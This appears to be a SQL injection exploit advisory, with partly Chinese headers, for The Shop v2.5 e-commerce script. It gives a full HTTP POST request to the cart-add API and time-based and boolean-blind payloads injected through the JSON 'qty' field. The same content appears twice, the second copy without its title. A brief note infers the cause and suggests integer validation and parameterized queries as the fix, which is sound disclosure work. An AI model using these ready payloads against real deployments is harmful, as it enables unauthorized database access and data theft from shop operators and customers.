# 利用标题: The Shop v2.5 - SQL 注入
# 日期: 2023-06-17
# 利用作者: Ahmet Ümit Bayram
#vendor: https://codecanyon.net/item/the-shop/34858541
#demo site: https://shop.activeitzone.com
# 测试环境: Kali Linux
# CVE: N/A
### 请求 ###
POST /api/v1/carts/add HTTP/1.1
Content-Type: application/json
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
X-XSRF-TOKEN: XJWXIPUDENXAHWGFDA1NUZBX1R155JZFHD5AB8L4
Referer: https://localhost
Cookie: xsrf-token=lbhb7u7sgrn4hb3db3nsgobmle2tgdiywiteejgl;
the_shop_session=igqjnenlvrfgyzvsvsvowwowwumdj8nrl2xzprxht93h7
Content-Length: 81
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: keep-alive

{"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0)","temp_user_id":null}
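### 参数与有效载荷 ###
参数: JSON qty ((custom) POST)
# 注: qty 本应是整数数量; 下列结果表明该值未经整数校验即进入 SQL 查询 (由测试结果推断, 本页未给出服务端代码)。修复方向: 对 qty 做严格的整数校验, 并使用参数化查询。
Type: 基于布尔的盲注
title: 基于布尔的盲注 - 参数替换(原始值)
payload: {"variation_id":"119","qty":"(select(case when(4420=4420)
then 'if(now()=sysdate(),sleep(6),0)' else (select 3816 union select 4495)
end))","temp_user_id":null}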
Type: 基于时间的盲注
title: MySQL >= 5.0.12 OR 基于时间的盲注(重查询)
payload: {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0) or
2614=(select count(*) from information_schema.columns a,
information_schema.columns b, information_schema.columns
c)","temp_user_id":null}
#日期: 2023-06-17
# 利用作者: Ahmet Ümit Bayram
#vendor: https://codecanyon.net/item/the-shop/34858541
#demo site: https://shop.activeitzone.com
# 测试环境: Kali Linux
# CVE: N/A
### 请求 ###
POST /api/v1/carts/add HTTP/1.1
Content-Type: application/json
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
X-XSRF-TOKEN: XJWXIPUDENXAHWGFDA1NUZBX1R155JZFHD5AB8L4
Referer: https://localhost
Cookie: xsrf-token=lbhb7u7sgrn4hb3db3nsgobmle2tgdiywiteejgl;
the_shop_session=igqjnenlvrfgyzvsvsvowwowwumdj8nrl2xzprxht93h7
Content-Length: 81
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: keep-alive

{"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0)","temp_user_id":null}
### 参数与有效载荷 ###
参数: JSON qty ((custom) POST)
Type: 基于布尔的盲注
title: 基于布尔的盲注 - 参数替换(原始值)
payload: {"variation_id":"119","qty":"(select(case when(4420=4420)
then 'if(now()=sysdate(),sleep(6),0)' else (select 3816 union select 4495)
end))","temp_user_id":null}
Type: 基于时间的盲注
title: MySQL >= 5.0.12 OR 基于时间的盲注(重查询)
payload: {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0) or
2614=(select count(*) from information_schema.columns a,
information_schema.columns b, information_schema.columns
c)","temp_user_id":null}